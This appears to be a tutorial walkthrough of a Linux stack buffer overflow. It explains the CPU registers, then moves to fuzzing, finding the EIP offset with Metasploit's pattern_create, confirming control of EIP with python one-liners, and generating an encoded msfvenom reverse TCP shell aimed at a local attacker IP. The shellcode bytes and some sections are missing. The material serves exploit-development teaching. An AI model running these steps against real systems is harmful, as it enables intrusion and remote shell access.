What is a buffer overflow?
A buffer overflow occurs when the part of a program that receives input receives too much input and has not been coded to handle it gracefully, causing the extra input to overflow into adjacent locations in memory and overwrite them. A properly coded program should handle excess input appropriately to prevent any memory leakage arising.
The below example shows what happens when a buffer overflow occurs.
CPU Registers and Memory pointers
When a program first starts it is pulled off the hard disk and put into memory so it can be read and written too much faster than if it was on the hard drive. The code is read using a memory pointer. The pointer reads the code line by line, top down and the cpu then executes each line accordingly.
Programming languages are designed to jump around, store values(variables) and have segments of code reused. These variables are stored in memory locations and the CPU registers are what keeps track of the locations and jump points so when the program is running, the memory pointer gets to these CPU registers and is sent to the correct locations in memory.
For buffer overflows the main three CPU registers that are important are the EIP, EBP and ESP registers.
EIP: Extended Instruction Pointer. This points to the next location in memory after the current process has finished executing.
ESP:Extended Stack Pointer. This points to the location on the top of the memory stack.
EBP: Extended Base Pointer. This points to the location at the bottom of the memory stack
Why is this bad
Walkthrough of a Buffer Overflow
Testing for Buffer Overflow aka: Fuzzing
Confirming EIP was overwritten
Now that we have overwritten EIP we need to find at exactly which point our bytes filled into EIP. We know that it happened somewhere between 4000 bytes and 4200 bytes. The easiest way to do this is to generate a completely unique string of 4200 bytes and then check the bytes that landed into EIP and locate those bytes in our 4200 unique string. This will tell us at exactly which point our bytes landed into EIP.
Metasploit comes with a pattern offset tool for exactly this purpose. Run the tool with the -l switch followed by the length of unique bytes to generate. In our case 4200.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4200
Now instead of sending 4200 ‘U’ characters into the program we now send this unique string.
run $(python -c “print ‘Aa0Aa1Aa2Aa3Aa4Aa5…<SNIP>…Bn6Bn7Bn8Bn9′”)
EIP has now been overwritten by 4 unique bytes that we can copy and use to find the exact location in our 4200 unique string.
Before creating our malicious shellcode we must first confirm we control EIP. Instead of sending 4200 ‘U’ and causing a crash we will send 4091 U’s followed by 4 A’s. This should result in memory registers before EIP being overwritten by 55(Hex value for U) and EIP being over written by exactly four 41s(Hex value for A). We know our total length of our buffer including EIP is 4095. (4091 for the offset plus 4 for EIP).
run $(python -c ‘print “\x55” * (4095 -4) + “\x41” * 4’)
Before creating final shellcode
Before creating shellcode there are a few cleanup tasks that need to be done to ensure our code is executed flawlessly. The first thing is to ensure we have enough room to fit our code within the buffer. Our code must be shorter than 4091 bytes. Additionally we need to pad our code to create empty space between ESP(Start of the stack) and the start of our code. The first reason for creating space is because of the technique we are going to use which will be explained later. The second is that the stack size can move about and “wobble” as other programs and functions are being run and pushing and popping things around in other memory segments.
Get the size of shellcode
To create our shell code I will be using another one of metasploits tools called msfvenom. Msfvenom makes it extremely easy to whip up simple backdoors and reverse shells. The reverse shell I will be using for this is a standard tcp reverse shell with code output in C shellcode:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.240 LPORT=6000 –platform linux –arch x86 –format c
No encoder specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf =
Identify and remove bad characters
The second cleanup task is identifying any bad characters in our shell code that could be interpreted by the program and cause our exploit to fail. For example, the characters in code that create a new line look like this in hex ‘0x0a’. So if our shellcode contains any 0x0a then our code will not run as the 0x0a will cause a new line and break the program. We do not know how the HT program we are exploiting was written and what bad chars are in there that may conflict with our shell code so in order to find any bad chars we need to submit the entire hex table into the HT program and examine it on the memory heap while noting down any missing characters indicating “bad chars”.
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf =
EIP = “\x66” * 4